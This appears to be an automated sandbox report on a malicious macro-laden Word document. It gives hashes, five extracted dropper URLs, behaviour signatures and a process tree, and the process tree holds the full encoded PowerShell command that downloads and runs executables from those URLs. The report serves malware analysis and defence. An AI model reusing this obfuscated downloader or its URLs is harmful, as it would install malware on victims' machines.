Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    31-05-2024 01:48

General

  • Target

    85a474ddbd555c895f388a4bd6027497_JaffaCakes118.doc

  • Size

    237KB

  • MD5

    85a474ddbd555c895f388a4bd6027497

  • SHA1

    67f909b1d4b16f691a88dbfc65b8d72a05b441c6

  • SHA256

    fda68ab66880ec8154bdc1a9595ec1f34fbf612ed3e9c9d13c7424ca0df1a5f4

  • SHA512

    6465c515fc534f8a0a674a8e882faf2f65353798dbea182e8e09c4caf52837457763e39b405e351f9254247a8836ef11663c54c24482e52460dd809c389988c0

  • SSDEEP

    3072:Pj6yw1MgpQiBhGWb6esLbTh8YuyDRBFtdfGkPmF9wsuD:PHgtEWPsL/aTyT9GkPmF9wsg

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://defiteqturkiye.com/Uh/

exe.dropper

http://www.electropixel.com/Te8qO04/

exe.dropper

http://elevationadvertising.com/mobile/cb595319/

exe.dropper

http://etawala.com/bae05905/

exe.dropper

http://diamondbraintutor.com/wp-includes/2G33O54/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\85a474ddbd555c895f388a4bd6027497_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2996
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1956
    • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
      powersheLL -e JABZAHoAbAB4AGoAcABqAD0AKAAnAE8AZgBsACcAKwAnADEAeAA2ADcAJwApADsAJgAoACcAbgBlAHcALQBpACcAKwAnAHQAJwArACcAZQBtACcAKQAgACQARQBuAFYAOgBUAGUAbQBQAFwAbwBmAGYAaQBDAEUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AHkAcABlACAARABJAHIARQBjAFQATwByAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBgAGMAYABVAFIASQB0AGAAWQBQAHIAYABPAFQATwBDAGAAbwBMACIAIAA9ACAAKAAnAHQAbAAnACsAJwBzADEAMgAsACcAKwAnACAAdABsAHMAMQAxACwAIAB0AGwAJwArACcAcwAnACkAOwAkAFAAeQB6AG4ANABuAHcAIAA9ACAAKAAnAFUAbgByAG0AMgB3ACcAKwAnADYAJwArACcAZABkACcAKQA7ACQAUwAwAG8AYQBkAHAAMQA9ACgAJwBJADAAJwArACcAagBqACcAKwAnAHYAOQB1ACcAKQA7ACQASgA1AGcAawBkAHAAdAA9ACQAZQBuAHYAOgB0AGUAbQBwACsAKAAoACcAewAnACsAJwAwAH0AJwArACcATwAnACsAJwBmAGYAaQBjAGUAMgAwACcAKwAnADEAOQB7ADAAfQAnACkAIAAgAC0AZgBbAEMAaABhAHIAXQA5ADIAKQArACQAUAB5AHoAbgA0AG4AdwArACgAJwAuAGUAeAAnACsAJwBlACcAKQA7ACQAVAA5AGUANQBnADIANAA9ACgAJwBPACcAKwAnAHAAOABrADYAbAAnACsAJwA1ACcAKQA7ACQATgB6AGcANQBmADgANwA9AC4AKAAnAG4AJwArACcAZQB3AC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAAbgBlAHQALgB3AGUAQgBDAEwASQBlAE4AdAA7ACQATgB3ADEAbAB3AGQAbgA9ACgAJwBoAHQAJwArACcAdAAnACsAJwBwACcAKwAnADoAJwArACcALwAvACcAKwAnAGQAZQBmAGkAdABlACcAKwAnAHEAdAAnACsAJwB1AHIAawBpAHkAZQAnACsAJwAuAGMAbwAnACsAJwBtACcAKwAnAC8AJwArACcAVQBoACcAKwAnAC8AKgAnACsAJwBoAHQAdABwACcAKwAnADoALwAvAHcAJwArACcAdwB3AC4AJwArACcAZQAnACsAJwBsACcAKwAnAGUAYwB0ACcAKwAnAHIAbwAnACsAJwBwAGkAJwArACcAeABlACcAKwAnAGwALgBjAG8AbQAvAFQAJwArACcAZQA4AHEATwAwADQALwAqAGgAdAB0AHAAOgAvACcAKwAnAC8AZQBsAGUAdgBhAHQAaQAnACsAJwBvAG4AJwArACcAYQBkAHYAZQByAHQAaQBzACcAKwAnAGkAJwArACcAbgBnAC4AYwBvAG0ALwBtACcAKwAnAG8AYgBpAGwAZQAvAGMAYgA1ADkAJwArACcANQAzACcAKwAnADEAOQAvACoAJwArACcAaAB0AHQAJwArACcAcAA6ACcAKwAnAC8ALwAnACsAJwBlACcAKwAnAHQAYQB3ACcAKwAnAGEAbABhACcAKwAnAC4AYwBvAG0ALwBiAGEAJwArACcAZQAwADUAJwArACcAOQAwADUAJwArACcALwAqACcAKwAnAGgAdAB0AHAAOgAvAC8AZABpAGEAJwArACcAbQBvAG4AJwArACcAZAAnACsAJwBiAHIAYQBpACcAKwAnAG4AdAB1AHQAbwByAC4AYwBvACcAKwAnAG0ALwB3ACcAKwAnAHAALQBpACcAKwAnAG4AYwBsACcAKwAnAHUAZABlAHMALwAnACsAJwAyAEcAMwAzAE8ANQAnACsAJwA0AC8AJwApAC4AIgBTAFAATABgAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAE8AbgB6AGwAbwB0AGMAPQAoACcAQQByAHQAJwArACcAOAB6ACcAKwAnAHQAMwAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABVAGwAMwBqAHkAdgA3ACAAaQBuACAAJABOAHcAMQBsAHcAZABuACkAewB0AHIAeQB7ACQATgB6AGcANQBmADgANwAuACIAZABgAG8AdwBgAE4ATABvAGEARABgAEYAaQBsAEUAIgAoACQAVQBsADMAagB5AHYANwAsACAAJABKADUAZwBrAGQAcAB0ACkAOwAkAFQAbgA3ADgAXwBqADEAPQAoACcARAB5AHEAJwArACcAeQAnACsAJwB0AHAAbAAnACkAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQASgA1AGcAawBkAHAAdAApAC4AIgBsAGAARQBuAGAARwBUAGgAIgAgAC0AZwBlACAAMgAwADQAMwA5ACkAIAB7ACYAKAAnAEkAbgB2AG8AJwArACcAawBlAC0ASQB0AGUAJwArACcAbQAnACkAKAAkAEoANQBnAGsAZABwAHQAKQA7ACQAQgAxAGkAaQBqAF8AaAA9ACgAJwBGADUAJwArACcAMQBpADcAYwBhACcAKQA7AGIAcgBlAGEAawA7ACQASgBzAHMAcQA4AGkAawA9ACgAJwBUAGYAMgAnACsAJwBjACcAKwAnAHAAbgB2ACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQATQAzAHgANQB1AGwAcwA9ACgAJwBSAGIAJwArACcAMwAnACsAJwBxAF8AMgBqACcAKQA=
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2780

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      c9d2d3df8d7b4c3df04dd9431b8bf9ab

      SHA1

      09bbe6f1032836a9c7ede32582679524e5d3add9

      SHA256

      7c0983e1d962358c910381a13586092de991d37f279e939a2fc7e31ae4054df6

      SHA512

      ea41d6ed67c15a2045b19688206bf80ac98c2f5f3ab592a15cd5c60adbce3c79fbb04c65b0438ea251561ef4486e8f4afd52bd7ccbe4c86e1bf5d02457e62fa5

    • memory/2780-40-0x0000000001F40000-0x0000000001F48000-memory.dmp

      Filesize

      32KB

    • memory/2780-39-0x000000001B710000-0x000000001B9F2000-memory.dmp

      Filesize

      2.9MB

    • memory/2996-33-0x0000000005810000-0x0000000005910000-memory.dmp

      Filesize

      1024KB

    • memory/2996-8-0x0000000005BD0000-0x0000000005CD0000-memory.dmp

      Filesize

      1024KB

    • memory/2996-22-0x0000000005810000-0x0000000005910000-memory.dmp

      Filesize

      1024KB

    • memory/2996-23-0x0000000005810000-0x0000000005910000-memory.dmp

      Filesize

      1024KB

    • memory/2996-32-0x0000000005810000-0x0000000005910000-memory.dmp

      Filesize

      1024KB

    • memory/2996-0-0x000000002F611000-0x000000002F612000-memory.dmp

      Filesize

      4KB

    • memory/2996-7-0x0000000005810000-0x0000000005910000-memory.dmp

      Filesize

      1024KB

    • memory/2996-2-0x000000007096D000-0x0000000070978000-memory.dmp

      Filesize

      44KB

    • memory/2996-47-0x000000007096D000-0x0000000070978000-memory.dmp

      Filesize

      44KB

    • memory/2996-48-0x0000000005810000-0x0000000005910000-memory.dmp

      Filesize

      1024KB

    • memory/2996-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2996-66-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2996-67-0x000000007096D000-0x0000000070978000-memory.dmp

      Filesize

      44KB